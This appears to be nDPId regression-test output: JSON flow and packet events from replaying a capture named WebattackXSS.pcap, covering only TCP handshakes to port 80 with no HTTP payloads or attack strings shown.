-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347508344,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347508344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QeJAAD4Gg+6sEAABwKgKMuJUAFDv7LYIAAAAAKACchDdRAAAAgQFtAQCCAoBOvfqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":2,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4lSsQaQu7+y2CaAScSDAbwAAAgQFtAQCCAoD5MlfATr36gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":3,"flow_last_seen":1499347508345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347508345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QeNAAD4Gg\/WsEAABwKgKMuJUAFDv7LYJrEGkL4AQAOVfdwAAAQEICgE69+oD5Mlf"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347509601,"flow_last_seen":1499347509601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347509601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1499347509601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2ZAAD4GcmqsEAABwKgKMuJiAFBgjKpCAAAAAKACchB3IwAAAgQFtAQCCAoBOvkkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":2,"flow_last_seen":1499347509601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4mJHoK+XYIyqQ6AScSCyTAAAAgQFtAQCCAoD5MqZATr5JAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":3,"flow_last_seen":1499347509602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347509602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2dAAD4GcnGsEAABwKgKMuJiAFBgjKpDR6CvmIAQAOVRVAAAAQEICgE6+SQD5MqZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347512081,"flow_last_seen":1499347512081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347512081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1499347512081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87jVAAD4G15qsEAABwKgKMuJ8AFAKmxWlAAAAAKACchBfLAAAAgQFtAQCCAoBOvuQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":2,"flow_last_seen":1499347512081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4nwCiqB4CpsVpqAScSDsHgAAAgQFtAQCCAoD5M0FATr7kAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":3,"flow_last_seen":1499347512082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347512082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07jZAAD4G16GsEAABwKgKMuJ8AFAKmxWmAoqgeYAQAOWLJgAAAQEICgE6+5AD5M0F"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347513353,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347513353,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ef1AAD4GS9OsEAABwKgKMuKKAFAHuIUzAAAAAKACchDxNAAAAgQFtAQCCAoBOvzOAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":2,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4oqWR\/ViB7iFNKAScSCUQQAAAgQFtAQCCAoD5M5DATr8zgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":3,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ef5AAD4GS9qsEAABwKgKMuKKAFAHuIU0lkf1Y4AQAOUzSQAAAQEICgE6\/M4D5M5D"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347514648,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347514648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81oFAAD4G706sEAABwKgKMuKYAFBs5yiTAAAAAKACchDnUwAAAgQFtAQCCAoBOv4SAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4562,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":2,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4pgH3WT1bOcolKAScSCn9AAAAgQFtAQCCAoD5M+HATr+EgEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":3,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01oJAAD4G71WsEAABwKgKMuKYAFBs5yiUB91k9oAQAOVG\/AAAAQEICgE6\/hID5M+H"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347517171,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347517171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PfRAAD4Gh9ysEAABwKgKMuKyAFAJ1z18AAAAAKACchAy6wAAAgQFtAQCCAoBOwCIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":2,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4rJwyiE5Cdc9faAScSDL4wAAAgQFtAQCCAoD5NH+ATsAiAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":3,"flow_last_seen":1499347517172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347517172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PfVAAD4Gh+OsEAABwKgKMuKyAFAJ1z19cMohOoAQAOVq6gAAAQEICgE7AIkD5NH+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347518410,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347518410,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FGZAAD4GsWqsEAABwKgKMuLAAFAhaxXYAAAAAKACchBBtwAAAgQFtAQCCAoBOwG+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4592,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":2,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4sCWVenKIWsV2aAScSDrXAAAAgQFtAQCCAoD5NM0ATsBvgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":3,"flow_last_seen":1499347518410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FGdAAD4GsXGsEAABwKgKMuLAAFAhaxXZllXpy4AQAOWKZAAAAQEICgE7Ab4D5NM0"} 